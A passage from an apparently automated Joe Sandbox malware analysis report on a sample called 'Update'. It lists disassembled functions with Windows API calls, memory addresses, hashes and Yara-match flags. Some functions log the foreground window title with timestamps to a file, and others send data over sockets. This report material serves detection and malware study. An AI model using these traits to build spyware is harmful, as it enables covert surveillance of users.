CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 10005D0B
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005D14

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 1400036169-0
Opcode ID: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
Instruction ID: f393ff6f41c53dec0a4a663a217bd1082015950f507b03806f4406e75142b299
Opcode Fuzzy Hash: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
Instruction Fuzzy Hash: 7AA1D7B0A01A56AFE354CF6AC8C479AFBE8FB08344F50862EE11DD7640D775A964CF90

Function 037F4CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,4EB10097,?,?,?,?,00000000,000000FF,00000000), ref: 037F4CE6
EnterCriticalSection.KERNEL32(?,4EB10097,?,?,?,?,00000000,000000FF,00000000), ref: 037F4D0D
SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 037F4D21
LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 037F4D28

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: ce735f95cdd38fcda2b39f66fd3e4a0568be529676327f90f3c5ad5904c91e21
Instruction ID: 1978269a8c78b3cabeb7f29fb870b8d40fc76a8e028ef3a6ec4b99789b4faf61
Opcode Fuzzy Hash: ce735f95cdd38fcda2b39f66fd3e4a0568be529676327f90f3c5ad5904c91e21
Instruction Fuzzy Hash: FF518E76A047059FC724EFA9E485A6EF7F8FF48710F044AAEEA1AD7740DB35A4008B51

Function 10004C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,4B556414,745947A0,?,?,00000001), ref: 10004CC6
EnterCriticalSection.KERNEL32(?,4B556414,745947A0,?,?,00000001), ref: 10004CED
SetLastError.KERNEL32(0000139F), ref: 10004D01
LeaveCriticalSection.KERNEL32(?), ref: 10004D08

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
Instruction ID: f936773d66b76d96f3ecbf8df82172045f4aecfa059d2fdb31757c61ce649d4c
Opcode Fuzzy Hash: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
Instruction Fuzzy Hash: 5351BCB6A04601DFE311DFA8D985B6AB7F4FF48751F01462EE90A8B740DB36E8008B91

Function 00C74C67 Relevance: 16.7, APIs: 11, Instructions: 156COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 00C74C9D
RtlEnterCriticalSection.NTDLL(?), ref: 00C74CC4
SetLastError.KERNEL32(0000139F), ref: 00C74CD8
RtlLeaveCriticalSection.NTDLL(?), ref: 00C74CDF

Memory Dump Source

Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c70000_Update.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
Instruction ID: 817adf9b2fd32e2230fd9e18606d14ceeff0757205f65d09031528aa254b02c2
Opcode Fuzzy Hash: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
Instruction Fuzzy Hash: AF51D076A04604DFD324DFA8C985A6AF7F4FF48711F04862EE91ADB741EB35E9008B90

Function 037FE730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FE751
GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 037FE759
GetWindowTextW.USER32(00000000,038216F0,00000800), ref: 037FE76F
_memset.LIBCMT ref: 037FE78D
lstrlenW.KERNEL32(038216F0,?,?,?,?,74DF23A0,00000000), ref: 037FE7AC
GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 037FE7BD
wsprintfW.USER32 ref: 037FE804

Part of subcall function 037FE6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6BD
Part of subcall function 037FE6B0: CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6D7
Part of subcall function 037FE6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FE6F2
Part of subcall function 037FE6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 037FE6FF
Part of subcall function 037FE6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 037FE70A
Part of subcall function 037FE6B0: CloseHandle.KERNEL32(00000000), ref: 037FE711
Part of subcall function 037FE6B0: ReleaseMutex.KERNEL32(00000000), ref: 037FE71E

_memset.LIBCMT ref: 037FE820

Strings

[, xrefs: 037FE7FE

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
String ID: [
API String ID: 2192163267-4056885943
Opcode ID: 2000000a4d28b1037ab33b00bdd74a84d87e71af2d577f664c095e8ed5e749eb
Instruction ID: 566372d150937d4509da4f73068d4a1507e77cddf938c0541a86eee0d7403384
Opcode Fuzzy Hash: 2000000a4d28b1037ab33b00bdd74a84d87e71af2d577f664c095e8ed5e749eb
Instruction Fuzzy Hash: 0421F375A00228AAC760EFA49C09FBEB7BDFB04700F10C1E5F94596280EE7459C4CBE4

Function 037F3DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3E05
LeaveCriticalSection.KERNEL32(?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3E50
send.WS2_32(?,000000FF,00000000,00000000), ref: 037F3E6E
EnterCriticalSection.KERNEL32(?), ref: 037F3E81
LeaveCriticalSection.KERNEL32(?), ref: 037F3E94
HeapFree.KERNEL32(00000000,00000000,?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EBC
WSAGetLastError.WS2_32(?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EC7
EnterCriticalSection.KERNEL32(?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EDB
LeaveCriticalSection.KERNEL32(?), ref: 037F3F14
HeapFree.KERNEL32(00000000,00000000,?), ref: 037F3F51

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
String ID:
API String ID: 1701177279-0
Opcode ID: bb21d63e84740d0aad758f275e05b31273d44e478c64702f725eb6c067b7d061
Instruction ID: 40e45b28d7d4de6a7908b31c69dca94c5673cc7ba7ab5df139d6aa44aa3b664d
Opcode Fuzzy Hash: bb21d63e84740d0aad758f275e05b31273d44e478c64702f725eb6c067b7d061
Instruction Fuzzy Hash: 30412775504A049FD724DF78D888AABF7F8FF48304F4489AEEA6ECB244D731A4418B50

Function 037F4F30 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 037F4F63
EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 037F4F78
WSASetLastError.WS2_32(00002746), ref: 037F4F8A
LeaveCriticalSection.KERNEL32(000002FF), ref: 037F4F91
timeGetTime.WINMM ref: 037F4FBF
timeGetTime.WINMM ref: 037F4FE7
SetEvent.KERNEL32(?), ref: 037F5025
InterlockedExchange.KERNEL32(?,00000001), ref: 037F5031
LeaveCriticalSection.KERNEL32(000002FF), ref: 037F5038
LeaveCriticalSection.KERNEL32(000002FF), ref: 037F504B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: 90d74416eb902a6c46c41ca60f42fdfe38a95d1ec191e25b70b51f247f39aa35
Instruction ID: 4184bbb1809bbf4655053cda705aee07124e42df14feafcdf02e67db4bc67dd5
Opcode Fuzzy Hash: 90d74416eb902a6c46c41ca60f42fdfe38a95d1ec191e25b70b51f247f39aa35
Instruction Fuzzy Hash: FD41A031600604DFD720EF7AD588A6AF7EDFB48324F084A99EA4A87751E375E4418B81

Function 10004F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(0000000D), ref: 10004F43
EnterCriticalSection.KERNEL32(?), ref: 10004F58
WSASetLastError.WS2_32(00002746), ref: 10004F6A
LeaveCriticalSection.KERNEL32(?), ref: 10004F71
timeGetTime.WINMM ref: 10004F9F
timeGetTime.WINMM ref: 10004FC7
SetEvent.KERNEL32(?), ref: 10005005
InterlockedExchange.KERNEL32(?,00000001), ref: 10005011
LeaveCriticalSection.KERNEL32(?), ref: 10005018
LeaveCriticalSection.KERNEL32(?), ref: 1000502B

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
String ID:
API String ID: 1979691958-0
Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
Instruction ID: 4b24d02a6ebada58952bd9850e7d83bafc68aeb9978cf5702291cfe2885936af
Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
Instruction Fuzzy Hash: 91410971600242DFF320DF68C988B5AB7F5FF48395F068569E54ACB255EB76EC408B81

Function 037FC270 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 037FC2AE
CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 037FC2CC
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 037FC309
CloseHandle.KERNEL32(00000000), ref: 037FC314
lstrlenW.KERNEL32(?), ref: 037FC321
wsprintfW.USER32 ref: 037FC345

Strings

%s %s, xrefs: 037FC33F

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
String ID: %s %s
API String ID: 1326869720-2939940506
Opcode ID: 9c3c11ef24203d8f416ddfae940c8b33212a13ea28bd6fb667e7a48370d0853f
Instruction ID: e9c6c0488db8ab6bd481215bf6fa0aacf40b8c523b38ab44199236ad15b92e89
Opcode Fuzzy Hash: 9c3c11ef24203d8f416ddfae940c8b33212a13ea28bd6fb667e7a48370d0853f
Instruction Fuzzy Hash: BB31923264021D6FDB25EA64DC85FEFB36CFB49311F4006D9F605A6280EA746A44CBA1

Function 037FC980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 88processstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 037FC98D
_wcsrchr.LIBCMT ref: 037FC9C7

Part of subcall function 037F7C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 037F7CC3
Part of subcall function 037F7C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 037F7CD7
Part of subcall function 037F7C80: FreeLibrary.KERNEL32(00000000), ref: 037F7CF7

GetFileAttributesW.KERNEL32(-00000002), ref: 037FC9E6
GetLastError.KERNEL32 ref: 037FC9F1
_memset.LIBCMT ref: 037FCA04
CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 037FCA31

Strings

D, xrefs: 037FCA23
WinSta0\Default, xrefs: 037FCA2A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
String ID: D$WinSta0\Default
API String ID: 174883095-1101385590
Opcode ID: a6b2f74666a7e7449a1e33ed7d9e2727b5c41ccbf507ca9f92eaeef2fe8421c4
Instruction ID: b6a0ede13ce72d069066189ec39dd9be135463ac314ab2d89f7a52725f11e869
Opcode Fuzzy Hash: a6b2f74666a7e7449a1e33ed7d9e2727b5c41ccbf507ca9f92eaeef2fe8421c4
Instruction Fuzzy Hash: 9911EBB69002086BD725EAB89C85FAFB76CEB45710F040265FB06DE3C4E635E505C6A2

Function 037F8159 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 58stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
lstrlenW.KERNEL32(?), ref: 037F81B7
__wcsnicmp.LIBCMT ref: 037F81CE
lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204
lstrcpyW.KERNEL32(?,?), ref: 037F8228
lstrcatW.KERNEL32(?,00000000), ref: 037F8233

Strings

B:\, xrefs: 037F8170
A:\, xrefs: 037F8160

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
String ID: A:\$B:\
API String ID: 4249875308-1009255891
Opcode ID: cc2455cbf8abf4244679eb8f50701288f70afe87e0a99efe3453f63baf54af72
Instruction ID: 435194205a1461204d66c669f7aa5648ad5c1d3f804f4ab41c58dfba64da5914
Opcode Fuzzy Hash: cc2455cbf8abf4244679eb8f50701288f70afe87e0a99efe3453f63baf54af72
Instruction Fuzzy Hash: 49114C72A01218EFDB24EFA0DD45BAEB378FF44210F0445D8DA1AA7240E774EA05CB95

Function 037F9730 Relevance: 13.7, APIs: 9, Instructions: 195timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4EB10097,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E,00000000), ref: 037F9773
InitializeCriticalSectionAndSpinCount.KERNEL32(037FE1AE,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9812
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9850
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9875
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F989A

Part of subcall function 037F1280: __CxxThrowException@8.LIBCMT ref: 037F1290
Part of subcall function 037F1280: DeleteCriticalSection.KERNEL32(00000000,037FD3E6,03816624,?,?,037FD3E6,?,?,?,?,03815A40,00000000), ref: 037F12A1

Part of subcall function 037FCE10: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE076,00000000,4EB10097,037FE04E,74DF2F60,00000000,?,037FE226,0381110B,000000FF,?,037F994A,037FE226), ref: 037FCE67
Part of subcall function 037FCE10: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE08E,00000000,?,037FE226,0381110B,000000FF,?,037F994A,037FE226,?,?,?,00000000,0381125B,000000FF), ref: 037FCE83

InterlockedExchange.KERNEL32(037FE066,00000000), ref: 037F99A0
timeGetTime.WINMM(?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99A6
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99B4
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99BD

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
String ID:
API String ID: 1400036169-0
Opcode ID: d788190d1c7e5ab9e6b06e4d0cc3f4444046a4ce8c0b662c58293704bb45c86b
Instruction ID: 9fef885121d930e635084af44b94a8f93c78300f735b3834be4cc48fb97bb413
Opcode Fuzzy Hash: d788190d1c7e5ab9e6b06e4d0cc3f4444046a4ce8c0b662c58293704bb45c86b
Instruction Fuzzy Hash: 1E81D5B0A01A46BFE344DF7AC88479AFBA8FB09354F50426ED12CD7640D775A964CF90

Function 037F3500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 037F3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 037F3667
Part of subcall function 037F3660: _free.LIBCMT ref: 037F369C
Part of subcall function 037F3660: _malloc.LIBCMT ref: 037F36D7
Part of subcall function 037F3660: _memset.LIBCMT ref: 037F36E5

InterlockedIncrement.KERNEL32(03821F0C), ref: 037F3565
InterlockedIncrement.KERNEL32(03821F0C), ref: 037F3573
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 037F359A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037F35B3
ResetEvent.KERNEL32(?,?,?,03821F0C), ref: 037F35EE
SetLastError.KERNEL32(00000000), ref: 037F3621
GetLastError.KERNEL32 ref: 037F3639

Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025

SetLastError.KERNEL32(00000000), ref: 037F3649

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: 855c102c851bd431d5f75ab64d392ce790b0a79df3e7856605e69fd5d8b40182
Instruction ID: 3056cced38423f23a9ae3e146d92547e43d238342b6b1c62a26be84ab13fd8df
Opcode Fuzzy Hash: 855c102c851bd431d5f75ab64d392ce790b0a79df3e7856605e69fd5d8b40182
Instruction Fuzzy Hash: 1C415BB9600704AFE360EF69DC81B6AF7E8FB88711F10496EE646D7740D7B5E4448B50

Function 10003500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 10003660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
Part of subcall function 10003660: _free.LIBCMT ref: 1000369C
Part of subcall function 10003660: _malloc.LIBCMT ref: 100036D7
Part of subcall function 10003660: _memset.LIBCMT ref: 100036E5

InterlockedIncrement.KERNEL32(1001D990), ref: 10003565
InterlockedIncrement.KERNEL32(1001D990), ref: 10003573
setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 1000359A
setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 100035B3
ResetEvent.KERNEL32(?,?,?,1001D990), ref: 100035EE
SetLastError.KERNEL32(00000000), ref: 10003621
GetLastError.KERNEL32 ref: 10003639

Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025

SetLastError.KERNEL32(00000000), ref: 10003649

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
String ID:
API String ID: 127459856-0
Opcode ID: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
Instruction ID: 683d4fe1a0db9e8cd201fdded36c2c75d02b426da01d37e97b5f8f569f7a2aba
Opcode Fuzzy Hash: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
Instruction Fuzzy Hash: 8041AFB5600704AFE360EF69CC81B9BB7E8FB48341F50882EE646D7690D7B1F8448B90

Function 037F4430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 037F4443
ResetEvent.KERNEL32(?), ref: 037F444C
timeGetTime.WINMM ref: 037F444E
InterlockedExchange.KERNEL32(?,00000000), ref: 037F445D
WaitForSingleObject.KERNEL32(?,00001770), ref: 037F44AB
ResetEvent.KERNEL32(?), ref: 037F44C8

Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025

ResetEvent.KERNEL32(?), ref: 037F44DC

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
String ID:
API String ID: 542259498-0
Opcode ID: f59584795ff6bfb714dee33f99238dde0dd1f8159288b5000826849030778c61
Instruction ID: b75b73d92d9a5d04a58fa5415f99700d1b2b984c07b039d7b5a37f3028747520
Opcode Fuzzy Hash: f59584795ff6bfb714dee33f99238dde0dd1f8159288b5000826849030778c61
Instruction Fuzzy Hash: 1E216176600B04ABC630EF79DC84AA7B3E8FF89710F100A5EE69AC7640D671F404CBA1

Function 10004430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 10004443
ResetEvent.KERNEL32(?), ref: 1000444C
timeGetTime.WINMM ref: 1000444E
InterlockedExchange.KERNEL32(?,00000000), ref: 1000445D
WaitForSingleObject.KERNEL32(?,00001770), ref: 100044AB
ResetEvent.KERNEL32(?), ref: 100044C8

Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025

ResetEvent.KERNEL32(?), ref: 100044DC

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

